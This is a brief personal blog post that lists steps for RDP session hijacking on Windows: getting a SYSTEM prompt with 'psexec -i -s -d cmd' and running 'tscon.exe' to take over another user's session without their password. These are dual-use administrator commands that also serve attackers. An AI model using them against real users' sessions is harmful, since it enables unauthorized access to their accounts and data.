DJ's software
Wednesday, June 13, 2018
RDP session hijacking (without password / as administrator)
Get session ID of the session you want to connect to
Get PsExec
Run CMD under System account from admin CMD: psexec -i -s -d cmd
Run tscon.exe <sessionID>
Sources:
PsExec
Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008
RDP hijacking — how to hijack RDS...
Newer Posts
Older Posts
Home
Subscribe to:
Posts (Atom)